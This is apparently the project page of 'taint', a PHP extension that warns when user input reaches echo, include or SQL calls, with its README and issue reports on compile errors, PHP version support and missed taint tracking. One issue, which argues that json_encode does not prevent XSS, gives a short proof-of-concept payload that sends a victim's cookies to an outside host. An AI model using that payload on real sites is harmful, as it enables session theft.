taint's Introduction

Taint

A PHP extension used to detect XSS code (tainted strings). It can also be used to spot SQL injection vulnerabilities, shell injection, etc.

The idea is from https://wiki.php.net/rfc/taint; I implemented it as a PHP extension, which makes the patch unnecessary.

Please note: do not enable this extension in a production environment, since it will slow down your app.

Requirement

  • PHP-5.2 +

NOTE

Due to the complexity of the PHP 8.0 implementation, taint is not going to be compatible with PHP 8.0+.

Install

taint is a PECL extension, so you can simply install it with:

pecl install taint

Compile taint in Linux

$ /path/to/phpize
$ ./configure --with-php-config=/path/to/php-config
$ make && make install

Usage

When taint is enabled, if you pass a tainted string (one that comes from $_GET, $_POST or $_COOKIE) to certain functions, taint will warn you about it.

<?php
$a = trim($_GET['a']);

$file_name = '/tmp' .  $a;
$output    = "Welcome, {$a} !!!";
$var       = "output";
$sql       = "Select *  from " . $a;
$sql      .= "ooxx";

echo $output;

print $$var;

include($file_name);

mysql_query($sql);

The above example will output something similar to:

Warning: main() [function.echo]: Attempt to echo a string that might be tainted

Warning: main() [function.echo]: Attempt to print a string that might be tainted

Warning: include() [function.include]: File path contains data that might be tainted

Warning: mysql_query() [function.mysql-query]: SQL statement contains data that might be tainted

If you need to hide the errors for a particular script, you can:

ini_set('taint.error_level', 0);

taint's People

Contributors

craigfrancis, fate0, jan-e, laruence, lcx517, remicollet, silenceper, staabm, timgates42

taint's Issues

Compile warning

Hi, Niao Ge,

There is a warning when compiling taint: it seems zend_get_parameters_ex() is already ZEND_ATTRIBUTE_DEPRECATED. Could it be changed to zend_parse_parameters?

    zval **arg;
    int tainted = 0;
  •   if (ZEND_NUM_ARGS() != 1 || zend_get_parameters_ex(1, &arg) == FAILURE) {
    
  •   if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "r", arg) == FAILURE) {
            WRONG_PARAM_COUNT;
    }
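
Review bot: in the proposed zend_parse_parameters() line, `arg` is passed by value while `zval **arg` is still uninitialized, and the "r" specifier accepts only a resource, whereas the zend_get_parameters_ex(1, &arg) call it replaces receives `&arg` and takes an argument of any type. Pass an address the parser can write to and choose a specifier that keeps the any-type behaviour, for example "Z" with `&arg` on PHP 5.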
    

taint-2.0.3 does not support PHP 7.0.0

The following error is reported at compile time:
./php_taint.h:60:3: error: "Unsupported PHP Version ID:" PHP_VERSION_ID

error "Unsupported PHP Version ID:" PHP_VERSION_ID

My PHP version:
PHP 7.0.0 (cli) (built: Dec 10 2015 14:13:08) ( NTS ) Copyright (c) 1997-2015 The PHP Group Zend Engine v3.0.0, Copyright (c) 1998-2015 Zend Technologies with Zend OPcache v7.0.6-dev, Copyright (c) 1999-2015, by Zend Technologies with Xdebug v2.4.0RC4-dev, Copyright (c) 2002-2015, by Derick Rethans

Looking at the source, ./php_taint.h:60:3 contains this section:

#if PHP_VERSION_ID > 70000
# if PHP_VERSION_ID >= 70200
# undef IS_STR_TAINT_POSSIBLE
/* Coflicts with GC_COLLECTABLE which is introduced in 7.2 */
# define IS_STR_TAINT_POSSIBLE (1<<6)
# endif
#else
# error "Unsupported PHP Version ID:" PHP_VERSION_ID
#endif

To support PHP 7.0.0, it needs to be changed to the following.
#if PHP_VERSION_ID >= 70000

PHP Startup: taint: Unable to initialize module (PHP5.4)

Niao Ge, I got an error.
Version:
PHP 5.4.27 (cli) (built: Apr 9 2014 13:17:08)
Linux star-virtual-machine 3.2.0-64-generic-pae #97-Ubuntu SMP Wed Jun 4 22:22:15 UTC 2014 i686 i686 i386 GNU/Linux

Warning: PHP Startup: taint: Unable to initialize module
Module compiled with module API=20090626
PHP compiled with module API=20100525
These options need to match
in Unknown on line 0

Add a function to check if a variable is made from string constants

Having tried the taint extension for a while, I find that it does a good job at identifying most issues, while only requiring minor tweaks to my code to avoid warnings.

However there are a few exceptions which can't be covered with the current implementation, for example mysqli_real_escape_string() without quote marks (see pg_escape_literal for comparison), or using preg_replace to sanitise a string.

So taking the idea from Matt Tait - https://wiki.php.net/rfc/sql_injection_protection

Would it be possible to keep the current implementation, but add a second flag that tracks if a variable has only been built from T_STRING constants?

Then add a new function that allows the programmer to check the variable is made from string constants, maybe with a function named is_string_constant, or is_static, etc.

This means the following could be possible to check for SQLi:

<?php

	class db {
		function fetch_row($sql, $parameters) {
			if (!is_string_constant($sql)) {
				throw new Exception('Not a static string.');
			}
			// ...
		}
		// ...
	}

?>
<?php

	define('SQL_TABLE_PREFIX', 'abc_');

	if ($_GET['order'] == 'desc') {
		$sql_order = 'DESC';
	} else {
		$sql_order = 'ASC';
	}

	$sql = 'SELECT
			*
		FROM
			' . SQL_TABLE_PREFIX . 'table
		WHERE
			field = ?
		ORDER BY
			field ' . $sql_order;
			
	$parameters = array();
	$parameters[] = array('s', $unsafe_var);

	if ($row = $db->fetch_row($sql, $parameters)) {
		// It works :-)
	}

?>

And likewise, a framework could provide a wrapper to exec/shell_exec/system/passthru which supports a form of parameterized command, while checking that the command itself is made from string constants.

Problem with PHP version 5.3.3

Environment: php version 5.3.3

The version 1.2.2 download from PECL runs into the Issue #6 problem; I then downloaded directly from GitHub, and make fails:

[tangyi@jiajutest php-taint]$ sudo make && makeinstall
[sudo] password for tangyi:
/bin/sh /home/tangyi/src/php-taint/libtool --mode=compile cc  -I. -I/home/tangyi/src/php-taint -DPHP_ATOM_INC -I/home/tangyi/src/php-taint/include -I/home/tangyi/src/php-taint/main -I/home/tangyi/src/php-taint -I/usr/local//include/php -I/usr/local//include/php/main -I/usr/local//include/php/TSRM -I/usr/local//include/php/Zend -I/usr/local//include/php/ext -I/usr/local//include/php/ext/date/lib  -DHAVE_CONFIG_H  -g -O2   -c /home/tangyi/src/php-taint/taint.c -o taint.lo
 cc -I. -I/home/tangyi/src/php-taint -DPHP_ATOM_INC -I/home/tangyi/src/php-taint/include -I/home/tangyi/src/php-taint/main -I/home/tangyi/src/php-taint -I/usr/local//include/php -I/usr/local//include/php/main -I/usr/local//include/php/TSRM -I/usr/local//include/php/Zend -I/usr/local//include/php/ext -I/usr/local//include/php/ext/date/lib -DHAVE_CONFIG_H -g -O2 -c /home/tangyi/src/php-taint/taint.c  -fPIC -DPIC -o .libs/taint.o
/home/tangyi/src/php-taint/taint.c: In function ‘php_taint_fetch_dimension_address’:
/home/tangyi/src/php-taint/taint.c:892: error: ‘zval’ has no member named ‘refcount’
/home/tangyi/src/php-taint/taint.c:892: error: ‘zval’ has no member named ‘is_ref’
/home/tangyi/src/php-taint/taint.c: In function ‘php_taint_binary_assign_op_obj_helper’:
/home/tangyi/src/php-taint/taint.c:1057: error: ‘zval’ has no member named ‘refcount’
/home/tangyi/src/php-taint/taint.c:1057: error: ‘zval’ has no member named ‘is_ref’
/home/tangyi/src/php-taint/taint.c: In function ‘zif_taint_strval’:
/home/tangyi/src/php-taint/taint.c:2248: warning: ‘zend_get_parameters_ex’ is deprecated (declared at /usr/local//include/php/Zend/zend_API.h:224)
make: *** [taint.lo] Error 1

json_encode is not safe to xss

http://stackoverflow.com/questions/5913503/xss-creating-a-javascript-object-using-phps-json-encode/40230653#40230653

A poc to steal cookie:

$xss=<<<EOL
<img id='id' src='http://balabla.com/xss.php?'>
<img src=# onerror=document.getElementById('id').src+=document.cookie>
EOL;
$arr['xss']=$xss;
echo json_encode($arr);

Actually json_encode is widely used to escape JS.
I suggest adding json_encode to http://php.net/manual/en/taint.detail.basic.php

pecl install doesn't work on 7.x

Any chance you could upload one of the recent 7.x-compatible releases to pecl.php.net so we can easily install them via the CLI and the pecl command?

mstaab@mst16:/$ php -v
PHP 7.0.14-2+deb.sury.org~xenial+1 (cli) ( NTS )
Copyright (c) 1997-2016 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2016 Zend Technologies
    with Zend OPcache v7.0.14-2+deb.sury.org~xenial+1, Copyright (c) 1999-2016, by Zend Technologies
    with Xdebug v2.5.0, Copyright (c) 2002-2016, by Derick Rethans
    with blackfire v1.14.1~linux-x64-non_zts70, https://blackfire.io, by Blackfireio Inc.

mstaab@mst16:/$ sudo pecl install taint
pecl/taint requires PHP (version >= 5.2.0, version <= 5.4.99), installed version is 7.0.14-2+deb.sury.org~xenial+1
No valid packages found
install failed

function.echo

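Niao Ge, the official site itself says echo is not a function but a language construct, so why does the output message still present it as a function?

echo is not a function (it is a language construct)

The echo mentioned in the introduction on the home page: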

Warning: main() [function.echo]: Attempt to echo a string that might be tainted

taint is not triggered after string concatenation

I found a problem: a call like this does not trigger taint:

$var = $_GET['var'];
$var1 = $var . 'string';
echo $var1;

I don't know whether this can be fixed.

call_user_func() loses taint

Using call_user_func() and call_user_func_array() causes loss of the taint value.

Example code:

<?php

$input = $_GET['in'];
$function = 'render';
// Send tainted variable to $function
$output = call_user_func($function, $input);

function render($input) {
  // $input is tainted
  if (is_tainted($input)) {
    print "Input is tainted<br>";
  }
  return $input;
}

// $output is tainted
if (is_tainted($output)) {
  print "Output is tainted<br>";
}

Output:

Input is tainted

copy of tainted variable makes original variable forget it was a reference

Copying a function variable makes it forget that it was a reference. This is with PHP 5.3.10 (latest in Ubuntu Precise).

Demo-code:

<?php

header('Content-Type: text/plain');

$string = '[email protected]';

echo "input: ".$string."\n";
echo "expected result: @bar.com\n-----\n\n";

taint($string);
checkEmailAddress($string);

untaint($string);
checkEmailAddress($string);

function checkEmailAddress($address) {

        if ( is_tainted($address) ) {
                echo "with tainted variable:\n";
        } else {
                echo "with normal variable:\n";
        }

        $ret = getAddressSpec($address);

        echo "RESULT: ";
        var_dump($address);
        echo "\n\n";
}

function getAddressSpec(&$at) {

        echo "BEFORE CHANGE: ";
        var_dump($at);

        // This line is the problem. It works for tainted variables if we remove it.
        $oldat = $at;

        // Change contents of reference
        $at = '@bar.com';

        echo "AFTER CHANGE IN SAME FUNCTION: ";
        var_dump($at);
}
?>

You'll see that the result of checkEmailAddress changes if we change the 'taintedness' of the variable given to the function.

Output for 5.3.10:

input: [email protected]
expected result: @bar.com
-----

with tainted variable:
BEFORE CHANGE: &string(11) "[email protected]"
AFTER CHANGE IN SAME FUNCTION: string(8) "@bar.com"
RESULT: string(11) "[email protected]"


with normal variable:
BEFORE CHANGE: string(11) "[email protected]"
AFTER CHANGE IN SAME FUNCTION: string(8) "@bar.com"
RESULT: string(8) "@bar.com"

No warning when executing a tainted SQL statement with mysqli_query

PHP version: 5.5.35 nts

Contents of sql.txt:
show databases

PHP code:
$link = mysqli_init();
mysqli_real_connect($link, '127.0.0.1', 'root', 'root', false, 3306);
$sql = file_get_contents("d:/sql.txt");
var_dump(is_tainted($sql));
taint($sql);
var_dump(is_tainted($sql));
$result = mysqli_query($link, $sql);
print_r(mysqli_fetch_all($result));
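When executing a tainted SQL statement with mysqli_query there is no warning, but it works once I change the argument fetching in the php_taint_fcall_check function in taint.c to the following: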
if (strncmp("mysqli_query", fname, len) == 0){
el = *((zval **)(p - (arg_count - 1)));
}else{
el = *((zval **)(p - arg_count));
}
I don't know what the reason is.

Compatibility with 5.5.x

Doesn't compile on 5.5.4.

/bin/sh /data/install/20130920/taint-1.2.2/libtool --mode=compile cc -I. -I/data/install/20130920/taint-1.2.2 -DPHP_ATOM_INC -I/data/install/20130920/taint-1.2.2/include -I/data/install/20130920/taint-1.2.2/main -I/data/install/20130920/taint-1.2.2 -I/data/php554/include/php -I/data/php554/include/php/main -I/data/php554/include/php/TSRM -I/data/php554/include/php/Zend -I/data/php554/include/php/ext -I/data/php554/include/php/ext/date/lib -DHAVE_CONFIG_H -g -O2 -c /data/install/20130920/taint-1.2.2/taint.c -o taint.lo
mkdir .libs
cc -I. -I/data/install/20130920/taint-1.2.2 -DPHP_ATOM_INC -I/data/install/20130920/taint-1.2.2/include -I/data/install/20130920/taint-1.2.2/main -I/data/install/20130920/taint-1.2.2 -I/data/php554/include/php -I/data/php554/include/php/main -I/data/php554/include/php/TSRM -I/data/php554/include/php/Zend -I/data/php554/include/php/ext -I/data/php554/include/php/ext/date/lib -DHAVE_CONFIG_H -g -O2 -c /data/install/20130920/taint-1.2.2/taint.c -fPIC -DPIC -o .libs/taint.o
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_get_zval_ptr_cv’:
/data/install/20130920/taint-1.2.2/taint.c:388:17: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_get_zval_ptr_ptr_cv’:
/data/install/20130920/taint-1.2.2/taint.c:417:17: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c:437:46: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_echo_handler’:
/data/install/20130920/taint-1.2.2/taint.c:504:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:507:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:510:16: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_include_or_eval_handler’:
/data/install/20130920/taint-1.2.2/taint.c:541:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:544:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:547:16: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_concat_handler’:
/data/install/20130920/taint-1.2.2/taint.c:595:12: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:598:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:601:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:613:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:616:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_binary_assign_op_obj_helper’:
/data/install/20130920/taint-1.2.2/taint.c:980:91: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:982:19: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:986:88: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1009:82: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1012:82: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1028:2: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1066:4: warning: passing argument 3 of ‘object->value.obj.handlers->get_property_ptr_ptr’ makes integer from pointer without a cast [enabled by default]
/data/install/20130920/taint-1.2.2/taint.c:1066:4: note: expected ‘int’ but argument is of type ‘struct zend_literal _’
/data/install/20130920/taint-1.2.2/taint.c:1066:4: error: too few arguments to function ‘object->value.obj.handlers->get_property_ptr_ptr’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_binary_assign_op_helper’:
/data/install/20130920/taint-1.2.2/taint.c:1196:90: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1228:80: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1231:80: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1256:40: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1257:88: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1258:79: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1267:80: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1270:80: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1288:86: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1315:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1316:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1317:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1317:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1317:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1317:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1317:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1317:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1375:3: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1377:3: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1377:3: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1377:3: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1377:3: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1377:3: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1377:3: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_add_string_handler’:
/data/install/20130920/taint-1.2.2/taint.c:1416:12: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1430:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1433:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_add_char_handler’:
/data/install/20130920/taint-1.2.2/taint.c:1473:12: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1487:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1490:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_add_var_handler’:
/data/install/20130920/taint-1.2.2/taint.c:1532:12: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1546:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1549:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1564:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1567:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_do_fcall_by_name_handler’:
/data/install/20130920/taint-1.2.2/taint.c:1896:40: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:1897:37: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:1910:66: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_assign_handler’:
/data/install/20130920/taint-1.2.2/taint.c:1928:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1932:16: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c:1954:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1958:16: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_assign_ref_handler’:
/data/install/20130920/taint-1.2.2/taint.c:2005:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:2009:16: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c:2029:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:2033:16: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_send_ref_handler’:
/data/install/20130920/taint-1.2.2/taint.c:2068:8: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2068:8: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2068:8: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2068:8: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2068:8: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2074:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:2078:16: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_send_var_handler’:
/data/install/20130920/taint-1.2.2/taint.c:2121:7: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2121:7: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2121:7: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2121:7: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2121:7: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2127:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:2131:16: error: ‘struct zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘zif_taint_strval’:
/data/install/20130920/taint-1.2.2/taint.c:2248:2: warning: ‘zend_get_parameters_ex’ is deprecated (declared at /data/php554/include/php/Zend/zend_API.h:238) [-Wdeprecated-declarations]
make: *** [taint.lo] Error 1

Variable tracing changed the reference of original variable!

The following is the test code:

test.php 
<?php
      $a = "hello";
      $id = &$a;
      $id = $_GET['id'];
      $c = $id;
      $id = "hello123";
      echo $a;
      echo $id;
?>

If you enter "http://*****/test.php?id=ab" in your browser with the taint extension added, the output in your page will be "abhello123". But it should output "hello123hello123"; this changes PHP's internal execution.

I think that the problem is caused by php_taint_assign_handler: when separating the variable, the reference count of op2 is decremented. php_taint_assign_ref_handler handles it the same way.

Your code

/*the problem code*/
else if (PZVAL_IS_REF(*op2) && Z_REFCOUNT_PP(op2) > 1) {
		SEPARATE_ZVAL(op2);
		Z_STRVAL_PP(op2) = erealloc(Z_STRVAL_PP(op2), Z_STRLEN_PP(op2) + 1 + PHP_TAINT_MAGIC_LENGTH);
		PHP_TAINT_MARK(*op2, PHP_TAINT_MAGIC_POSSIBLE);
	}

@laruence

Release for php 7.3 compatibility

Hi,

I see there are commits on master for php 7.3 compatibility, but the latest released version 2.0.4 doesn't include those commits. Could you release a new version?

Throw Exceptions instead of triggering Errors/Warnings

It would be great if taint could be configured (e.g. using taint.error_level) to throw proper Exceptions instead of triggering Errors/Warnings.

That way we would have a proper backtrace, and locating the actual errors would be much easier.

PHP 7.3.0 + Taint 2.0.5 + Arrays

Something isn't right with arrays:

<?php

$t = [];
$t['html'] = '
	<ul>';

foreach (['a', 'b', 'c'] as $area) {
	$t['html'] .= '
		<li>' . htmlentities($area) . '</li>';
}

$t['html'] .= '
	</ul>';

echo $t['html'];

?>

Produces the following output:

	<ul>
		<li>a</li>
		<li>b</li>
		<li>c</li>
		<li>

I'm not sure where the extra <li> comes from.

And while most of the time it produces the above, sometimes (often the first time the script is run after saving) it produces:

	<ul>
		<li>a</li>
		<li>b</li>
		<li>c</li></li>

I've not had it return the </ul>.

Concatenating assignment operator loses taint

Running PHP 7.0.10 using the concatenating assignment operator appears to lose taint.

If I run the following script which concatenates strings normally:

<?php
error_reporting(E_ALL);
ini_set('display_errors', '1');

$a = "tainted string" . ".";
taint($a);
$b = 'some string ' . $a;

echo $b;

I get the following output as expected:

Warning: main() [echo]: Attempt to echo a string that might be tainted in /path/to/taint-test.php on line 9

Call Stack:
    0.0001     356120   1. {main}() /path/to/taint-test.php:0

some string tainted string.

However, if I instead use the concatenating assignment operator in the following script:

<?php
error_reporting(E_ALL);
ini_set('display_errors', '1');

$a = "tainted string" . ".";
taint($a);
$b = 'some string ';
$b .= $a;

echo $b;

The output is simply some string tainted string. and no warning is raised.

Expanding list of functions that spread the tainted mark

https://bugs.php.net/bug.php?id=74066

I've only just started using the extension, but I'd have thought that the following would have raised warnings.

Test script:

<?php

$tainted = '1-Evil';
taint($tainted);

preg_match('/^1-(.*)/', $tainted, $matches);

echo $matches[1] . "\n";
echo str_ireplace('1-', '2-', $tainted) . "\n";
echo preg_replace('/^1-/', '2-', $tainted) . "\n";

?>

Expected result:


Warning: main() [echo]: Attempt to echo a string that might be tainted in ./index.php on line 8
1-Evil
Warning: main() [echo]: Attempt to echo a string that might be tainted in ./index.php on line 9
2-Evil
Warning: main() [echo]: Attempt to echo a string that might be tainted in ./index.php on line 10
2-Evil

Actual result:

Evil
2-Evil
2-Evil

The php7 branch fails with VC14 x86 NTS

@laruence

C:\php-sdk\php70dev>nmake php_taint.dll

Microsoft (R) Program Maintenance Utility Version 14.00.23026.0
Copyright (C) Microsoft Corporation.  All rights reserved.

        "cl.exe" /D COMPILE_DL_TAINT /D TAINT_EXPORTS=1 /nologo /I . /I main /I Zend /I TSR
M /I ext /D _WINDOWS /D ZEND_WIN32=1 /D PHP_WIN32=1 /D WIN32 /D _MBCS /W3 /FD /wd4996 /D_US
E_32BIT_TIME_T=1 /guard:cf /MP /Zi /LD /MD /W3 /Ox /D NDebug /D NDEBUG /D ZEND_WIN32_FORCE_
INLINE /GF /D ZEND_DEBUG=0 /I "C:\php-sdk\win32build\include" /D FD_SETSIZE=256 /I "..\zlib
" /FoC:\php-sdk\php70dev\Release\ext\taint\ /FpC:\php-sdk\php70dev\Release\ext\taint\ /FRC:
\php-sdk\php70dev\Release\ext\taint\ /FdC:\php-sdk\php70dev\Release\ext\taint\ /c ext\taint
\taint.c
taint.c
ext\taint\taint.c(289): warning C4018: '<=': signed/unsigned mismatch
ext\taint\taint.c(299): warning C4018: '<=': signed/unsigned mismatch
ext\taint\taint.c(801): error C2440: 'function': cannot convert from 'int (__cdecl *)(zval
*,zval *,zval *)' to 'binary_op_type'
ext\taint\taint.c(801): warning C4024: 'php_taint_assign_op_overloaded_property': different
 types for formal and actual parameter 5
ext\taint\taint.c(842): error C2440: 'function': cannot convert from 'int (__cdecl *)(zval
*,zval *,zval *)' to 'binary_op_type'
ext\taint\taint.c(842): warning C4024: 'php_taint_binary_assign_op_obj_dim': different type
s for formal and actual parameter 5
ext\taint\taint.c(915): error C2440: 'function': cannot convert from 'int (__vectorcall *)(
zval *,zval *,zval *)' to 'int (__cdecl *)(zval *,zval *,zval *)'
ext\taint\taint.c(915): warning C4024: 'php_taint_binary_assign_op_helper': different types
 for formal and actual parameter 1
ext\taint\taint.c(917): error C2440: 'function': cannot convert from 'int (__vectorcall *)(
zval *,zval *,zval *)' to 'int (__cdecl *)(zval *,zval *,zval *)'
ext\taint\taint.c(917): warning C4024: 'php_taint_binary_assign_op_dim_helper': different t
ypes for formal and actual parameter 1
ext\taint\taint.c(919): error C2440: 'function': cannot convert from 'int (__vectorcall *)(
zval *,zval *,zval *)' to 'int (__cdecl *)(zval *,zval *,zval *)'
ext\taint\taint.c(919): warning C4024: 'php_taint_binary_assign_op_obj_helper': different t
ypes for formal and actual parameter 1
ext\taint\taint.c(970): warning C4018: '<': signed/unsigned mismatch
NMAKE : fatal error U1077: '"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\BIN\cl.
exe"' : return code '0x2'
Stop.

Does taint not support PHP 5.6?

My testing environment: php5.6 + mysql + nginx. I constructed the "EasyTalk" website in it and added taint extension to php, it is invalid that I request the web page. The problem is in php_taint_send_var_handler and php_taint_assign_handle function.
@laruence

conflict with xdebug?

Hi Laurence,

This is an awesome extension, thanks so much for developing this!

I detected a conflict between xdebug and php-taint, and developed a little test-case:

$a = $_GET['test'];

$b = " " . $a; // this is where $b loses its taint with xdebug

if (is_tainted($b)) {
  echo "without xdebug I go here";
} else {
  echo "with xdebug i go here";
}

I am not sure if this is a problem of xdebug or php-taint.

To avoid false-negatives, maybe php-taint can include a warning if it is running together with xdebug?

Keep up the great work!
Joost

User registered opcode handler should call ones already set by other extensions

The taint extension marks a conflict with Xdebug.

This extension registers an opcode handler. This handler currently returns the ZEND_USER_OPCODE_DISPATCH value, which means that the Zend engine uses its internal implementation to further handle that opcode. If however another extension (such as Xdebug) has also overridden the opcode, its handler will not be called.

Make sure to remember already set handlers, and then call these if they're not NULL, and otherwise continue returning ZEND_USER_OPCODE_DISPATCH.

taint/taint.c

Line 1225 in 4a6c4cb

static void php_taint_register_handlers() /* {{{ */ {

See also https://bugs.xdebug.org/1759, which I've recently fixed.
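
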